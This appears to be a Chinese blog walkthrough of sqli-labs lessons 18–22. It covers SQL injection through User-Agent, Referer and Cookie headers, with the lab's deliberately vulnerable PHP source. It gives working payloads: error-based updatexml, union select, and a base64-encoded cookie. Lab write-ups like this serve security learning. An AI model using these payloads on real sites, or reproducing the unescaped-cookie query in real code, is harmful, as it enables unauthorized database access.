less18 user-agent的注入

源码分析:



check_input对name,password进行了过滤

function check_input($value)

	{

	if(!empty($value))

		{

		// truncation (see comments)

		$value = substr($value,0,20);

		}

		// Stripslashes if magic quotes enabled

		if (get_magic_quotes_gpc())

			{

			$value = stripslashes($value);

			}

		// Quote if not a number

		if (!ctype_digit($value))

			{

			$value = "'" . mysql_real_escape_string($value) . "'";

			}

	else

		{

		$value = intval($value);

		}

	return $value;

	}

进行查询,并进行验证,也就是用户密码正确才能进行下一步





payload:User-Agent:’ or updatexml(1,concat(’#’,(database())),0),’’)#

less19 referer的注入

同上

Referer: ’ or updatexml(1,concat(’#’,(database())),0),’’,’’)#

less-20 cookie的注入

同样的对password和username进行了过滤,cookie中的uname未过滤

账号,密码同样要求正确

通过下面的源码可以发现,非post提交的数据可以之间取cookie进行查询

if(!isset($_POST['submit']))

		{

			$cookee = $_COOKIE['uname'];

			$format = 'D d M Y - H:i:s';

			$timestamp = time() + 3600;

			echo "<center>";

			echo '<br><br><br>';

			echo '<img src="../images/Less-20.jpg" />';

			echo "<br><br><b>";

			echo '<br><font color= "red" font size="4">';

			echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];

			echo "</font><br>";

			echo '<font color= "cyan" font size="4">';

			echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];

			echo "</font><br>";

			echo '<font color= "#FFFF00" font size = 4 >';

			echo "DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE <br>";

			echo '<font color= "orange" font size = 5 >';

			echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);

			echo "<br></font>";

			$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";

			$result=mysql_query($sql);

payload : Cookie:uname= ’ union select 1,2,3 – #

less-21

源码分析:同样对username和passwd进行了过滤

不同的是:

对username进行了编码



sql语句



构造payload :

Cookie:uname=JykgdW5pb24gc2VsZWN0IDEsMiwzIC0tICM=

less-22

同上,闭合为"



最新文章

  1. 三目运算符是不是在bug中躺了枪_折腾了一整天
  2. LAMP安装各种问题解决方案
  3. 10324 Global Warming dfs + 二分
  4. ArcEngine尝试读取或写入受保护的内存
  5. Joke
  6. 产品不应该大而全,而是应该小而精(DropBox有感,产品要1分钟学会)
  7. [转] gdb 查看vector, list, map 内容
  8. android-Activity的执行流程
  9. 变量 - PHP手册笔记
  10. android 根据域名得到IP
  11. 认识ASP.NET MVC的5种AuthorizationFilter
  12. 缩短url-url短地址链接
  13. 转 Java输入输出流详解(非常详尽)
  14. 如何扩展VS2017未安装的功能
  15. JavaScript(数组、Date、正则)
  16. 开启FIPS协议
  17. spring boot 多数据源配置与使用
  18. Python-1 试玩OpenCV
  19. 20155223 Exp9 Web安全基础实践
  20. hdu 1728 逃离迷宫 bfs记转向

热门文章

  1. [vijos1234]口袋的天空&lt;最小生成树&gt;
  2. 图解GC流程
  3. Mob 之 短信验证集成 SMSSDK
  4. Innodb的三大关健特性
  5. java Jsoup.clean 处理入参时,会将换行符解析成空字符串问题
  6. A 拜访奶牛
  7. Aplayer搭配Metingjs音乐插件的使用
  8. 根据银行卡号 获取银行名称及银行logo
  9. Oauth2.0详解,Oauth2.0协议原理
  10. Jmeter 压力测试笔记(1)--服务器迁移失败